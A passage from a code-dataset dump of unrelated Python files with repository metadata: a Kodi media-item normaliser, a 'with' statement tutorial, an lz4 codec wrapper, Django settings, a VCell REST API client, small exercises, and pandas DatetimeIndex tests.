if 'director' in item and isinstance(item['director'], list):
item["director"] = " / ".join(item['director'])
if 'artist' in item and not isinstance(item['artist'], list):
item["artist"] = [item['artist']]
if 'artist' not in item:
item["artist"] = []
if item['type'] == "album" and 'album' not in item and 'label' in item:
item['album'] = item['label']
if "duration" not in item and "runtime" in item:
if (item["runtime"] / 60) > 300:
item["duration"] = item["runtime"] / 60
else:
item["duration"] = item["runtime"]
if "plot" not in item and "comment" in item:
item["plot"] = item["comment"]
if "tvshowtitle" not in item and "showtitle" in item:
item["tvshowtitle"] = item["showtitle"]
if "premiered" not in item and "firstaired" in item:
item["premiered"] = item["firstaired"]
if "firstaired" in item and "aired" not in item:
item["aired"] = item["firstaired"]
if "imdbnumber" not in properties and "imdbnumber" in item:
properties["imdbnumber"] = item["imdbnumber"]
if "imdbnumber" not in properties and "uniqueid" in item:
for value in list(item["uniqueid"].values()):
if value.startswith("tt"):
properties["imdbnumber"] = value
properties["dbtype"] = item["type"]
properties["DBTYPE"] = item["type"]
properties["type"] = item["type"]
properties["path"] = item.get("file")
# cast
list_cast = []
list_castandrole = []
item["cast_org"] = item.get("cast", [])
if "cast" in item and isinstance(item["cast"], list):
for castmember in item["cast"]:
if isinstance(castmember, dict):
list_cast.append(castmember.get("name", ""))
list_castandrole.append((castmember["name"], castmember["role"]))
else:
list_cast.append(castmember)
list_castandrole.append((castmember, ""))
item["cast"] = list_cast
item["castandrole"] = list_castandrole
if "season" in item and "episode" in item:
properties["episodeno"] = "s%se%s" % (item.get("season"), item.get("episode"))
if "resume" in item:
properties["resumetime"] = str(item['resume']['position'])
properties["totaltime"] = str(item['resume']['total'])
properties['StartOffset'] = str(item['resume']['position'])
# streamdetails
if "streamdetails" in item:
streamdetails = item["streamdetails"]
audiostreams = streamdetails.get('audio', [])
videostreams = streamdetails.get('video', [])
subtitles = streamdetails.get('subtitle', [])
if len(videostreams) > 0:
stream = videostreams[0]
height = stream.get("height", "")
width = stream.get("width", "")
if height and width:
resolution = ""
if width <= 720 and height <= 480:
resolution = "480"
elif width <= 768 and height <= 576:
resolution = "576"
elif width <= 960 and height <= 544:
resolution = "540"
elif width <= 1280 and height <= 720:
resolution = "720"
elif width <= 1920 and height <= 1080:
resolution = "1080"
elif width * height >= 6000000:
resolution = "4K"
properties["VideoResolution"] = resolution
if stream.get("codec", ""):
properties["VideoCodec"] = str(stream["codec"])
if stream.get("aspect", ""):
properties["VideoAspect"] = str(round(stream["aspect"], 2))
item["streamdetails"]["video"] = stream
# grab details of first audio stream
if len(audiostreams) > 0:
stream = audiostreams[0]
properties["AudioCodec"] = stream.get('codec', '')
properties["AudioChannels"] = str(stream.get('channels', ''))
properties["AudioLanguage"] = stream.get('language', '')
item["streamdetails"]["audio"] = stream
# grab details of first subtitle
if len(subtitles) > 0:
properties["SubtitleLanguage"] = subtitles[0].get('language', '')
item["streamdetails"]["subtitle"] = subtitles[0]
else:
item["streamdetails"] = {}
item["streamdetails"]["video"] = {'duration': item.get('duration', 0)}
# additional music properties
if 'album_description' in item:
properties["Album_Description"] = item.get('album_description')
# pvr properties
if "starttime" in item:
# convert utc time to local time
item["starttime"] = localdate_from_utc_string(item["starttime"])
item["endtime"] = localdate_from_utc_string(item["endtime"])
# set some localized versions of the time and date as additional properties
startdate, starttime = localized_date_time(item['starttime'])
enddate, endtime = localized_date_time(item['endtime'])
properties["StartTime"] = starttime
properties["StartDate"] = startdate
properties["EndTime"] = endtime
properties["EndDate"] = enddate
properties["Date"] = "%s %s-%s" % (startdate, starttime, endtime)
properties["StartDateTime"] = "%s %s" % (startdate, starttime)
properties["EndDateTime"] = "%s %s" % (enddate, endtime)
# set date to startdate
item["date"] = arrow.get(item["starttime"]).format("DD.MM.YYYY")
if "channellogo" in item:
properties["channellogo"] = item["channellogo"]
properties["channelicon"] = item["channellogo"]
if "episodename" in item:
properties["episodename"] = item["episodename"]
if "channel" in item:
properties["channel"] = item["channel"]
properties["channelname"] = item["channel"]
item["label2"] = item["title"]
# artwork
art = item.get("art", {})
if item["type"] in ["episode", "season"]:
if not art.get("fanart") and art.get("season.fanart"):
art["fanart"] = art["season.fanart"]
if not art.get("poster") and art.get("season.poster"):
art["poster"] = art["season.poster"]
if not art.get("landscape") and art.get("season.landscape"):
art["poster"] = art["season.landscape"]
if not art.get("fanart") and art.get("tvshow.fanart"):
art["fanart"] = art.get("tvshow.fanart")
if not art.get("poster") and art.get("tvshow.poster"):
art["poster"] = art.get("tvshow.poster")
if not art.get("clearlogo") and art.get("tvshow.clearlogo"):
art["clearlogo"] = art.get("tvshow.clearlogo")
if not art.get("banner") and art.get("tvshow.banner"):
art["banner"] = art.get("tvshow.banner")
if not art.get("landscape") and art.get("tvshow.landscape"):
art["landscape"] = art.get("tvshow.landscape")
if not art.get("fanart") and item.get('fanart'):
art["fanart"] = item.get('fanart')
if not art.get("thumb") and item.get('thumbnail'):
art["thumb"] = get_clean_image(item.get('thumbnail'))
if not art.get("thumb") and art.get('poster'):
art["thumb"] = get_clean_image(art.get('poster'))
if not art.get("thumb") and item.get('icon'):
art["thumb"] = get_clean_image(item.get('icon'))
if not item.get("thumbnail") and art.get('thumb'):
item["thumbnail"] = art["thumb"]
# clean art
if sys.version_info.major == 3:
for key, value in list(art.items()):
if not isinstance(value, str):
art[key] = ""
elif value:
art[key] = get_clean_image(value)
else:
if sys.version_info.major == 3:
for key, value in list(art.items()):
if not isinstance(value, str):
art[key] = ""
elif value:
art[key] = get_clean_image(value)
else:
for key, value in list(art.items()):
if not isinstance(value, (value, str)):
art[key] = ""
elif value:
art[key] = get_clean_image(value)
item["art"] = art
item["extraproperties"] = properties
if "file" not in item:
log_msg("Item is missing file path ! --> %s" % item["label"], xbmc.LOGWARNING)
item["file"] = ""
# return the result
return item
except Exception as exc:
log_exception(__name__, exc)
log_msg(item)
return None
@staticmethod
def tvshow_watchedcounts(tvshow):
"""append watched counts to tvshow details"""
tvshow["extraproperties"] = {"totalseasons": str(tvshow["season"]),
"totalepisodes": str(tvshow["episode"]),
"watchedepisodes": str(tvshow["watchedepisodes"]),
"unwatchedepisodes": str(tvshow["episode"] - tvshow["watchedepisodes"])
}
return tvshow
| 48.207171
| 119
| 0.53011
|
45e1c3f612bcaf9f13501d36cc807cdd282d28c1
| 1,426
|
py
|
Python
|
function/with.py
|
Max-PJB/python-learning2
|
e8b05bef1574ee9abf8c90497e94ef20a7f4e3bd
|
[
"MIT"
] | null | null | null |
function/with.py
|
Max-PJB/python-learning2
|
e8b05bef1574ee9abf8c90497e94ef20a7f4e3bd
|
[
"MIT"
] | null | null | null |
function/with.py
|
Max-PJB/python-learning2
|
e8b05bef1574ee9abf8c90497e94ef20a7f4e3bd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
@ Author : Max_Pengjb
@ date : 2018/9/23 22:37
@ IDE : PyCharm
@ GitHub : https://github.com/JackyPJB
@ Contact : pengjianbiao@hotmail.com
-------------------------------------------------
Description :
-------------------------------------------------
"""
__author__ = 'Max_Pengjb'
"""
with如何工作?
这看起来充满魔法,但不仅仅是魔法,Python对with的处理还很聪明。基本思想是with所求值的对象必须有一个__enter__()方法,一个__exit__()方法。
紧跟with后面的语句被求值后,返回对象的__enter__()方法被调用,这个方法的返回值将被赋值给as后面的变量。当with后面的代码块全部被执行完之后,将调用前面返回对象的__exit__()方法。
"""
class Sample:
def __enter__(self):
print("In __enter__()")
def __init__(self):
pass
def __exit__(self, type, value, trace):
print("In __exit__()")
print("type:", type)
print("value:", value)
print("trace:", trace)
def do_something(self):
bar = 1/0
return bar + 10
with Sample() as sample:
print("sample:", sample)
"""
正如你看到的,
1.__enter__()方法被执行
2.__enter__()方法返回的值 - 这个例子中是"Foo",赋值给变量'sample'
3.执行代码块,打印变量"sample"的值为"Foo"
4.__exit__()方法被调用with真正强大之处是它可以处理异常。可能你已经注意到Sample类的__exit__方法有三个参数 - val, type和trace。
这些参数在异常处理中相当有用。我们来改一下代码,看看具体如何工作的。
"""
# with Sample() as sample:
# sample.do_something()
sa = Sample()
sa.do_something()
| 24.169492
| 102
| 0.556802
|
d63e20b26ae2ab0528b0cae1dcad7ea96037d772
| 240
|
py
|
Python
|
src/fastavro_codecs/_lz4.py
|
rolando/fastavro-codecs
|
40b319557d056f36fbfcf292fe0c4372f88c0d37
|
[
"MIT"
] | 1
|
2017-07-20T16:36:02.000Z
|
2017-07-20T16:36:02.000Z
|
src/fastavro_codecs/_lz4.py
|
rmax/fastavro-codecs
|
40b319557d056f36fbfcf292fe0c4372f88c0d37
|
[
"MIT"
] | null | null | null |
src/fastavro_codecs/_lz4.py
|
rmax/fastavro-codecs
|
40b319557d056f36fbfcf292fe0c4372f88c0d37
|
[
"MIT"
] | null | null | null |
from lz4 import compress, decompress
from ._base import BaseCodec
class Lz4Codec(BaseCodec):
# TODO: Unreleased version of lz4 support compression arguments.
encode = staticmethod(compress)
decode = staticmethod(decompress)
| 21.818182
| 68
| 0.766667
|
b0d49d8fae0818a4fade847c9dc637e51e8862d8
| 127
|
py
|
Python
|
backend/couscous/settings/production.py
|
jimmykamau/couscous
|
97a1b36e159df39239e3485bd90be0639aa44d38
|
[
"MIT"
] | 1
|
2020-10-26T10:23:58.000Z
|
2020-10-26T10:23:58.000Z
|
backend/couscous/settings/production.py
|
jimmykamau/couscous
|
97a1b36e159df39239e3485bd90be0639aa44d38
|
[
"MIT"
] | 9
|
2019-11-21T12:43:42.000Z
|
2022-02-10T14:18:01.000Z
|
backend/couscous/settings/production.py
|
jimmykamau/couscous
|
97a1b36e159df39239e3485bd90be0639aa44d38
|
[
"MIT"
] | null | null | null |
import json
import os
from couscous.settings.base import *
ALLOWED_HOSTS = json.loads(os.environ.get('ALLOWED_HOSTS', '[]'))
| 18.142857
| 65
| 0.748031
|
587d3977530b085ff615e2277aa2e32a67ab1ae8
| 10,886
|
py
|
Python
|
pythonScripts/VCell_API/vcellapi.py
|
vcellmike/Biosimulators_VCell
|
b313f9c46ea78815505959e994ba3744ab49ada0
|
[
"MIT"
] | 38
|
2017-09-08T08:51:43.000Z
|
2022-02-08T02:25:19.000Z
|
pythonScripts/VCell_API/vcellapi.py
|
vcellmike/Biosimulators_VCell
|
b313f9c46ea78815505959e994ba3744ab49ada0
|
[
"MIT"
] | 79
|
2018-04-01T16:37:58.000Z
|
2022-03-30T18:10:23.000Z
|
pythonScripts/VCell_API/vcellapi.py
|
vcellmike/Biosimulators_VCell
|
b313f9c46ea78815505959e994ba3744ab49ada0
|
[
"MIT"
] | 17
|
2017-09-12T18:21:56.000Z
|
2022-01-04T19:49:35.000Z
|
import requests
import hashlib
class BiomodelsQuerySpec(object):
def __init__(self):
self.bmName="";
self.bmId="";
self.category="all";
self.owner="";
self.savedLow="";
self.savedHigh="";
self.startRow="";
self.maxRows="10";
self.orderBy="date_desc";
def getQueryString(self):
return "bmName="+self.bmName+"&"+ \
"bmId="+self.bmId+"&"+ \
"category="+self.category+"&"+ \
"owner="+self.owner+"&"+ \
"savedLow="+self.savedLow+"&"+ \
"savedHigh="+self.savedHigh+"&"+ \
"startRow="+self.startRow+"&"+ \
"maxRows="+self.maxRows+"&"+ \
"orderBy="+self.orderBy;
class SimulationTasksQuerySpec(object):
def __init__(self):
self.submitLow = "";
self.submitHigh = "";
self.startRow = "1";
self.maxRows = "10";
self.serverId = ""; # "alpha"
self.computeHost = ""; # "signode10"
self.simId = "";
self.jobId = "";
self.taskId = "";
self.hasData = "all"; # "all", "yes", "no"
self.waiting = "on";
self.queued = "on";
self.dispatched = "on";
self.running = "on";
self.completed = "on";
self.failed = "on";
self.stopped = "on";
def getQueryString(self):
return "submitLow"+"="+self.submitLow+"&"+ \
"submitHigh"+"="+self.submitHigh+"&"+ \
"startRow"+"="+self.startRow+"&"+ \
"maxRows"+"="+self.maxRows+"&"+ \
"serverId"+"="+self.serverId+"&"+ \
"computeHost"+"="+self.computeHost+"&"+ \
"simId"+"="+self.simId+"&"+ \
"jobId"+"="+self.jobId+"&"+ \
"taskId"+"="+self.taskId+"&"+ \
"hasData"+"="+self.hasData+"&"+ \
"waiting"+"="+self.waiting+"&"+ \
"queued"+"="+self.queued+"&"+ \
"dispatched"+"="+self.dispatched+"&"+ \
"running"+"="+self.running+"&"+ \
"completed"+"="+self.completed+"&"+ \
"failed"+"="+self.failed+"&"+ \
"stopped"+"="+self.stopped;
class AccessToken(object):
def __init__(self):
self.token = ""
self.creationDateSeconds = 0;
self.expireDateSeconds = 0;
self.userId = "";
self.userKey = "";
def loadJSON(self, accessToken_dict):
self.__dict__.update(accessToken_dict)
class MathModelLink(object):
def __init__(self):
self.mathModelKey = "";
self.mathModelBranchId = "";
self.mathModelName = "";
class BioModelLink(object):
def __init__(self):
self.bioModelKey = "";
self.bioModelBranchId = "";
self.bioModelName = "";
self.simContextKey = "";
self.simContextBranchId = "";
self.simContextName = "";
class Application(object):
def __init__(self):
self.key = "";
self.branchId = "";
self.name = "";
self.ownerName = "";
self.ownerKey = "";
self.mathKey = "";
def loadJSON(self, json_dictionary):
self.__dict__.update(json_dictionary)
class Simulation(object):
def __init__(self):
self.key = "";
self.branchId = "";
self.name = "";
self.ownerName = "";
self.ownerKey = "";
self.mathKey = "";
self.solverName = "";
self.scanCount = -1;
self.mathModelLink = None;
self.bioModelLink = None;
def loadJSON(self,simulation_dict):
self.__dict__.update(simulation_dict)
if (self.bioModelLink != None):
link = BioModelLink()
link.__dict__.update(self.bioModelLink)
self.bioModelLink = link
if (self.mathModelLink != None):
link = MathModelLink()
link.__dict__.update(s.mathModelLink)
self.mathModelLink = link
class SimulationTask(object):
def __init__(self):
self.simKey = "";
self.simName = "";
self.userName = "";
self.userKey = "";
self.htcJobId = "";
self.status = "";
self.startdate = None;
self.jobIndex = None;
self.taskId = None;
self.message = "";
self.site = "";
self.computeHost = "";
self.schedulerStatus = "";
self.hasData = None;
self.scanCount = None;
self.mathModelLink = None;
self.bioModelLink = None;
def loadJSON(self, simTask_dict):
self.__dict__.update(simTask_dict)
if (self.bioModelLink != None):
link = BioModelLink()
link.__dict__.update(self.bioModelLink)
self.bioModelLink = link
if (self.mathModelLink != None):
link = MathModelLink()
link.__dict__.update(s.mathModelLink)
self.mathModelLink = link
class Biomodel(object):
def __init__(self):
self.bmKey = "";
self.name = "";
self.privacy = -1;
self.groupUsers = { "" };
self.savedDate = -1;
self.annot = "";
self.branchID = "";
self.modelKey = "";
self.ownerName = ""
self.ownerKey = "";
self.simulations = [];
self.applications = [];
def loadJSON(self,biomodel_dict):
self.__dict__.update(biomodel_dict)
if (self.applications != None):
apps = [];
for application_dict in self.applications:
a = Application()
a.loadJSON(application_dict)
apps.append(a)
self.applications = apps
if (self.simulations != None):
sims = [];
for simulation_dict in self.simulations:
s = Simulation()
s.loadJSON(simulation_dict)
sims.append(s)
self.simulations = sims
class VCellApi(object):
def __init__(self, host, port, clientID): # (self, host, port, clientID, bIgnoreCertProblem, bIgnoreHostMismatch):
self.host = host
self.port = port
self.clientID = clientID
#self.bIgnoreCertProblem = bIgnoreCertProblem
#self.bIgnoreHostMismatch = bIgnoreHostMismatch
self.userid = None;
self.passowrd = None;
self.access_token = None; # '30fead75-4f3e-40af-88c5-3623e3228858';
def _getResponse(self,url,bRequiresAuth):
if (self.access_token == None):
if (bRequiresAuth == False):
response = requests.get(url)
else:
raise AssertionError("call requires authentication")
else:
response = requests.get(url, auth=('access_token', self.access_token))
if (response.status_code != 200):
print("url "+url+" returned with unexpected status "+str(response.status_code))
raise Exception("url "+url+" returned with unexpected status "+str(response.status_code))
return response
def _post(self,url,bRequiresAuth):
if (self.access_token == None):
if (bRequiresAuth == False):
response = requests.post(url)
else:
raise AssertionError("call requires authentication")
else:
response = requests.get(url, auth=('access_token', self.access_token))
if (response.status_code != 200):
print("url "+url+" returned with unexpected status "+str(response.status_code))
raise Exception("url "+url+" returned with unexpected status "+str(response.status_code))
return response
def authenticate(self,userid,clearTextPassword):
m = hashlib.sha1()
m.update(clearTextPassword);
digestedPassword = m.hexdigest().upper()
url = 'https://'+self.host+":"+str(self.port)+"/access_token?user_id="+userid+"&user_password="+digestedPassword+"&client_id="+self.clientID
accessTokenResponse = requests.get(url);
accessToken = AccessToken()
accessToken.loadJSON(accessTokenResponse.json())
self.access_token = accessToken.token
def logout(self):
self.access_token = null;
def getBiomodel(self,biomodelID):
biomodelResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID),False)
biomodel = Biomodel()
biomodel.loadJSON(biomodelResponse.json())
assert isinstance(biomodel,Biomodel)
return biomodel
def getBiomodels(self,biomodelsQuerySpec):
assert isinstance(biomodelsQuerySpec,BiomodelsQuerySpec) or biomodelsQuerySpec == None
if (biomodelsQuerySpec == None):
biomodelsQuerySpec = BiomodelsQuerySpec()
biomodelsResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/biomodel?'+biomodelsQuerySpec.getQueryString(),False)
biomodels = [];
for biomodel_dict in biomodelsResponse.json():
b = Biomodel()
b.loadJSON(biomodel_dict)
biomodels.append(b)
return biomodels
def getSimulation(self, biomodelID, simKey):
simulationResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID)+'/simulation/'+str(simKey), False)
s = Simulation()
s.loadJSON(simulationResponse.json());
assert isinstance(s,Simulation)
return s
def getSimulationTasks(self, simTasksQuerySpec):
assert isinstance(simTasksQuerySpec,SimulationTasksQuerySpec) or simTasksQuerySpec == None
if (simTasksQuerySpec == None):
simTasksQuerySpec = SimulationTasksQuerySpec()
simTasksResponse = self._getResponse('https://'+self.host+":"+str(self.port)+'/simtask?'+simTasksQuerySpec.getQueryString(), True)
simTasks = [];
for simTask_dict in simTasksResponse.json():
s = SimulationTask()
s.loadJSON(simTask_dict)
simTasks.append(s)
return simTasks
def startSimulation(self, biomodelID, simKey):
simulationStartResponse = self._post('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID)+'/simulation/'+str(simKey)+'/startSimulation', True)
simTasks = [];
for simTask_dict in simulationStartResponse.json():
s = SimulationTask()
s.loadJSON(simTask_dict)
simTasks.append(s)
return simTasks
def stopSimulation(self, biomodelID, simKey):
simulationStopResponse = self._post('https://'+self.host+":"+str(self.port)+'/biomodel/'+str(biomodelID)+'/simulation/'+str(simKey)+'/stopSimulation', True)
simTasks = [];
for simTask_dict in simulationStartResponse.json():
s = SimulationTask()
s.loadJSON(simTask_dict)
simTasks.append(s)
return simTasks
| 34.01875
| 166
| 0.568804
|
4dda4c0f37286d640127b1f855658e57c4b43f89
| 537
|
py
|
Python
|
Exercícios/Ex.92.py
|
mattheuslima/Projetos-Curso_Python
|
ab4cab98fe69b70245b5bcf41edd0febe823ac6a
|
[
"MIT"
] | null | null | null |
Exercícios/Ex.92.py
|
mattheuslima/Projetos-Curso_Python
|
ab4cab98fe69b70245b5bcf41edd0febe823ac6a
|
[
"MIT"
] | null | null | null |
Exercícios/Ex.92.py
|
mattheuslima/Projetos-Curso_Python
|
ab4cab98fe69b70245b5bcf41edd0febe823ac6a
|
[
"MIT"
] | null | null | null |
from datetime import datetime
trabalhador={"Nome":str(input("Qual o nome? ")),
"Ano de nascimento":int(input("Qual o ano de nascimento: ")),
"CTPS":int(input("Qual o número da CTPS (0 se não tem) ")),
"Ano de contratação":int(input("Qual o ano de contratação? ")),
"Salário":int(input("Qual o salário ? R$ "))
}
trabalhador["Idade"]=datetime.now().year-trabalhador["Ano de nascimento"]
print('-='*20)
for k,v in trabalhador.items():
print(f'- O {k} tem o valor {v}')
| 41.307692
| 76
| 0.590317
|
b577496467257e6ddd69259ebf0b4845b9e49837
| 261
|
py
|
Python
|
plutoid_web/logger.py
|
manasgarg/plutoid-web
|
ff5aa0657d04ea298ad3f33dd2a61eaf22b3acf6
|
[
"MIT"
] | null | null | null |
plutoid_web/logger.py
|
manasgarg/plutoid-web
|
ff5aa0657d04ea298ad3f33dd2a61eaf22b3acf6
|
[
"MIT"
] | null | null | null |
plutoid_web/logger.py
|
manasgarg/plutoid-web
|
ff5aa0657d04ea298ad3f33dd2a61eaf22b3acf6
|
[
"MIT"
] | null | null | null |
from fluent.sender import FluentSender
fluent_sender = None
def log(label, data):
if fluent_sender: fluent_sender.emit(label, data)
else: print(label, data)
def init_logger(prefix):
global fluent_sender
fluent_sender = FluentSender(prefix)
| 18.642857
| 53
| 0.747126
|
7707a963451108b8985e38659685a50889b5aef0
| 606
|
py
|
Python
|
debug/debugc_warp_mlogistic.py
|
gitter-badger/fdasrsf_python
|
f59bd74b570662c17a1a042556d4887e6a75fa3e
|
[
"BSD-3-Clause"
] | 34
|
2017-02-17T13:48:49.000Z
|
2022-02-27T11:17:14.000Z
|
debug/debugc_warp_mlogistic.py
|
gitter-badger/fdasrsf_python
|
f59bd74b570662c17a1a042556d4887e6a75fa3e
|
[
"BSD-3-Clause"
] | 23
|
2018-05-21T20:12:26.000Z
|
2022-03-28T23:19:10.000Z
|
debug/debugc_warp_mlogistic.py
|
gitter-badger/fdasrsf_python
|
f59bd74b570662c17a1a042556d4887e6a75fa3e
|
[
"BSD-3-Clause"
] | 12
|
2018-03-07T13:16:06.000Z
|
2021-12-31T05:21:53.000Z
|
import numpy as np
import fdasrsf as fs
import mlogit_warp as mw
import h5py
fun = h5py.File('/Users/jdtucker/Documents/Research/fdasrsf/debug/debug_data.h5')
q = fun['q'][:]
y = fun['y'][:]
time = fun['time'][:]
alpha = fun['alpha'][:]
beta = fun['beta'][:]
max_itr = 10000 # 4000
tol = 1e-10
delta = .01
display = 1
gam_old = mw.mlogit_warp(np.ascontiguousarray(alpha),
np.ascontiguousarray(beta),
time, np.ascontiguousarray(q),
np.ascontiguousarray(y, dtype=np.int32), max_itr,
tol, delta, display)
| 26.347826
| 81
| 0.587459
|
0017271fe6c97d5b25c417a478bc01bca643f88f
| 53,037
|
py
|
Python
|
pandas/tests/indexes/test_datetimelike.py
|
RTBHOUSE/pandas
|
e27b29697f0dcf9359f01a19edb2f20c6d728b6c
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | 1
|
2019-10-24T09:00:26.000Z
|
2019-10-24T09:00:26.000Z
|
pandas/tests/indexes/test_datetimelike.py
|
RTBHOUSE/pandas
|
e27b29697f0dcf9359f01a19edb2f20c6d728b6c
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/indexes/test_datetimelike.py
|
RTBHOUSE/pandas
|
e27b29697f0dcf9359f01a19edb2f20c6d728b6c
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | 3
|
2019-12-24T18:46:58.000Z
|
2021-09-04T11:57:13.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta, time, date
import numpy as np
from pandas import (DatetimeIndex, Float64Index, Index, Int64Index,
NaT, Period, PeriodIndex, Series, Timedelta,
TimedeltaIndex, date_range, period_range,
timedelta_range, notnull)
import pandas.util.testing as tm
import pandas as pd
from pandas.tslib import Timestamp, OutOfBoundsDatetime
from .common import Base
class DatetimeLike(Base):
def test_shift_identity(self):
idx = self.create_index()
self.assert_index_equal(idx, idx.shift(0))
def test_str(self):
# test the string repr
idx = self.create_index()
idx.name = 'foo'
self.assertFalse("length=%s" % len(idx) in str(idx))
self.assertTrue("'foo'" in str(idx))
self.assertTrue(idx.__class__.__name__ in str(idx))
if hasattr(idx, 'tz'):
if idx.tz is not None:
self.assertTrue(idx.tz in str(idx))
if hasattr(idx, 'freq'):
self.assertTrue("freq='%s'" % idx.freqstr in str(idx))
def test_view(self):
super(DatetimeLike, self).test_view()
i = self.create_index()
i_view = i.view('i8')
result = self._holder(i)
tm.assert_index_equal(result, i)
i_view = i.view(self._holder)
result = self._holder(i)
tm.assert_index_equal(result, i_view)
class TestDatetimeIndex(DatetimeLike, tm.TestCase):
_holder = DatetimeIndex
_multiprocess_can_split_ = True
def setUp(self):
self.indices = dict(index=tm.makeDateIndex(10))
self.setup_indices()
def create_index(self):
return date_range('20130101', periods=5)
def test_shift(self):
# test shift for datetimeIndex and non datetimeIndex
# GH8083
drange = self.create_index()
result = drange.shift(1)
expected = DatetimeIndex(['2013-01-02', '2013-01-03', '2013-01-04',
'2013-01-05',
'2013-01-06'], freq='D')
self.assert_index_equal(result, expected)
result = drange.shift(-1)
expected = DatetimeIndex(['2012-12-31', '2013-01-01', '2013-01-02',
'2013-01-03', '2013-01-04'],
freq='D')
self.assert_index_equal(result, expected)
result = drange.shift(3, freq='2D')
expected = DatetimeIndex(['2013-01-07', '2013-01-08', '2013-01-09',
'2013-01-10',
'2013-01-11'], freq='D')
self.assert_index_equal(result, expected)
def test_construction_with_alt(self):
i = pd.date_range('20130101', periods=5, freq='H', tz='US/Eastern')
i2 = DatetimeIndex(i, dtype=i.dtype)
self.assert_index_equal(i, i2)
i2 = DatetimeIndex(i.tz_localize(None).asi8, tz=i.dtype.tz)
self.assert_index_equal(i, i2)
i2 = DatetimeIndex(i.tz_localize(None).asi8, dtype=i.dtype)
self.assert_index_equal(i, i2)
i2 = DatetimeIndex(
i.tz_localize(None).asi8, dtype=i.dtype, tz=i.dtype.tz)
self.assert_index_equal(i, i2)
# localize into the provided tz
i2 = DatetimeIndex(i.tz_localize(None).asi8, tz='UTC')
expected = i.tz_localize(None).tz_localize('UTC')
self.assert_index_equal(i2, expected)
# incompat tz/dtype
self.assertRaises(ValueError, lambda: DatetimeIndex(
i.tz_localize(None).asi8, dtype=i.dtype, tz='US/Pacific'))
def test_pickle_compat_construction(self):
pass
def test_construction_index_with_mixed_timezones(self):
# GH 11488
# no tz results in DatetimeIndex
result = Index([Timestamp('2011-01-01'),
Timestamp('2011-01-02')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01'),
Timestamp('2011-01-02')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# same tz results in DatetimeIndex
result = Index([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='Asia/Tokyo')],
name='idx')
exp = DatetimeIndex(
[Timestamp('2011-01-01 10:00'), Timestamp('2011-01-02 10:00')
], tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# same tz results in DatetimeIndex (DST)
result = Index([Timestamp('2011-01-01 10:00', tz='US/Eastern'),
Timestamp('2011-08-01 10:00', tz='US/Eastern')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-08-01 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# different tz results in Index(dtype=object)
result = Index([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
name='idx')
exp = Index([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
result = Index([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
name='idx')
exp = Index([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
# length = 1
result = Index([Timestamp('2011-01-01')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# length = 1 with tz
result = Index(
[Timestamp('2011-01-01 10:00', tz='Asia/Tokyo')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00')], tz='Asia/Tokyo',
name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
def test_construction_index_with_mixed_timezones_with_NaT(self):
# GH 11488
result = Index([pd.NaT, Timestamp('2011-01-01'),
pd.NaT, Timestamp('2011-01-02')], name='idx')
exp = DatetimeIndex([pd.NaT, Timestamp('2011-01-01'),
pd.NaT, Timestamp('2011-01-02')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# same tz results in DatetimeIndex
result = Index([pd.NaT, Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
pd.NaT, Timestamp('2011-01-02 10:00',
tz='Asia/Tokyo')],
name='idx')
exp = DatetimeIndex([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00')],
tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# same tz results in DatetimeIndex (DST)
result = Index([Timestamp('2011-01-01 10:00', tz='US/Eastern'),
pd.NaT,
Timestamp('2011-08-01 10:00', tz='US/Eastern')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'), pd.NaT,
Timestamp('2011-08-01 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
